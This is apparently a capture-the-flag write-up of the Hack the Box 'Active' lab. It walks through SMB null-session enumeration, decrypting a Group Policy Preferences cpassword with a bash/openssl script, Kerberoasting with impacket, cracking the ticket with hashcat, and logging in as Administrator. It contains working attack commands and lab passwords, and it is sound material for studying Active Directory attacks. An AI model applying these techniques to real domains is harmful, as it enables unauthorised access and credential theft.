cyb3rdan.com Another infosec blog

Hack the Box - Active


  • nmap turned up a set of open ports typical of a domain controller
nmap -vv -sC -sV -oA initial 10.10.10.100

[screenshot: nmap scan output]

  • tested and confirmed that an SMB null session could be established by listing the shares anonymously (note that smbclient's -p option is the TCP port, not the password; -N sends an empty password without prompting):
smbclient -L 10.10.10.100 -W ACTIVE -U '' -N
  • found a Group Policy Preferences file, groups.xml, carrying an account and an AES-encrypted password in its cpassword attribute; the AES key is published by Microsoft in MS-GPPREF, so anyone who can read the file can recover the password (MS14-025 stopped new cpasswords from being written, but it did not remove the ones already in SYSVOL)
userName="active.htb\SVC_TGS"
cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
python gpprefdecrypt.py edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
  • got the password: GPPstillStandingStrong2k18
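
The same decryption done with nothing but openssl, so the result can be checked without gpprefdecrypt.py. This is an added example, not code from the original post: it assumes GNU coreutils base64, openssl and tr are on the path, and the Groups.xml fragment at the bottom is a constructed, trimmed-down file with the cpassword from above dropped into it.

```bash
#!/usr/bin/env bash
# Decrypt Group Policy Preferences cpassword values offline. The AES-256 key is
# the one Microsoft published in MS-GPPREF, so anyone who can read the XML can do this.
set -eu

# 32-byte AES key from MS-GPPREF (hex). Same key for every domain.
GPP_AES_KEY=4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b

# Decrypt one cpassword value and print the cleartext password.
gpp_decrypt() {
    cpass="$1"
    # SYSVOL stores the base64 without '=' padding; restore it or base64 -d refuses it.
    while [ $(( ${#cpass} % 4 )) -ne 0 ]; do
        cpass="${cpass}="
    done
    # AES-256-CBC with an all-zero IV and PKCS#7 padding (openssl strips the padding).
    # The plaintext is UTF-16LE, so dropping the NUL bytes leaves the ASCII password.
    printf '%s' "$cpass" | base64 -d \
        | openssl enc -d -aes-256-cbc -K "$GPP_AES_KEY" -iv 00000000000000000000000000000000 \
        | tr -d '\000'
}

# Walk a GPP XML file (Groups.xml, Services.xml, ScheduledTasks.xml, ...) and print
# one "account:password" line per Properties element that carries a cpassword.
gpp_dump_file() {
    grep -o '<Properties[^>]*cpassword="[^"]*"[^>]*>' "$1" | while IFS= read -r el; do
        cpass=$(printf '%s' "$el" | sed -n 's/.*cpassword="\([^"]*\)".*/\1/p')
        user=$(printf '%s' "$el" | sed -n 's/.*userName="\([^"]*\)".*/\1/p')
        printf '%s:%s\n' "${user:-<no userName>}" "$(gpp_decrypt "$cpass")"
    done
}

# Constructed, trimmed Groups.xml fragment for the demo (not a file from the post);
# only the cpassword and userName values are taken from the box.
GPP_SAMPLE=$(mktemp)
cat > "$GPP_SAMPLE" <<'EOF'
<?xml version="1.0" encoding="utf-8"?>
<Groups><User name="active.htb\SVC_TGS"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User></Groups>
EOF
gpp_dump_file "$GPP_SAMPLE"   # -> active.htb\SVC_TGS:GPPstillStandingStrong2k18
rm -f "$GPP_SAMPLE"
```

Point gpp_dump_file at anything pulled from SYSVOL\<domain>\Policies; a mismatched key or a truncated value shows up as openssl's "bad decrypt" rather than as garbage, because the PKCS#7 padding check fails.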

  • researched Kerberos, since the account name (SVC_TGS reads as a service account, and TGS is Kerberos' ticket-granting service) together with the host being a domain controller suggested a Kerberoasting angle

  • found https://malicious.link/post/2016/kerberoast-pt2/ and more specifically the reference to impacket at the bottom of the page

  • cloned impacket from its GitHub repository

  • ran the following command with the SVC_TGS credentials (it prompts for the password; -dc-ip is given so the script does not depend on active.htb resolving) and got the output below

./GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS

[screenshot: GetUserSPNs.py output with the $krb5tgs$23$ hash]

  • checked the Hashcat example hashes page: the $krb5tgs$23$ prefix means the service ticket was encrypted with etype 23 (RC4-HMAC), which is hashcat mode 13100 (Kerberos 5 TGS-REP etype 23)

  • added the entire $krb5tgs$23$ string above to a file called active.krb, and ran hashcat against it with the rockyou.txt wordlist

./hashcat -m 13100 active.krb /pentest/wordlists/rockyou.txt
  • after only a few seconds I had the password: Ticketmaster1968

  • ran the following with the cracked password to connect to the Users share as Administrator (the password goes in the -U argument after a %; smbclient's -p is the port option, not the password)

smbclient //10.10.10.100/Users -W ACTIVE -U 'Administrator%Ticketmaster1968'
  • browsed to Administrator/Desktop and ran the following to get the flag
get root.txt
  • to get a shell as Administrator you can simply use impacket's psexec.py script with the same credentials; it uploads a service binary to a writable admin share and starts it as a service, so expect it to be noisy on a monitored host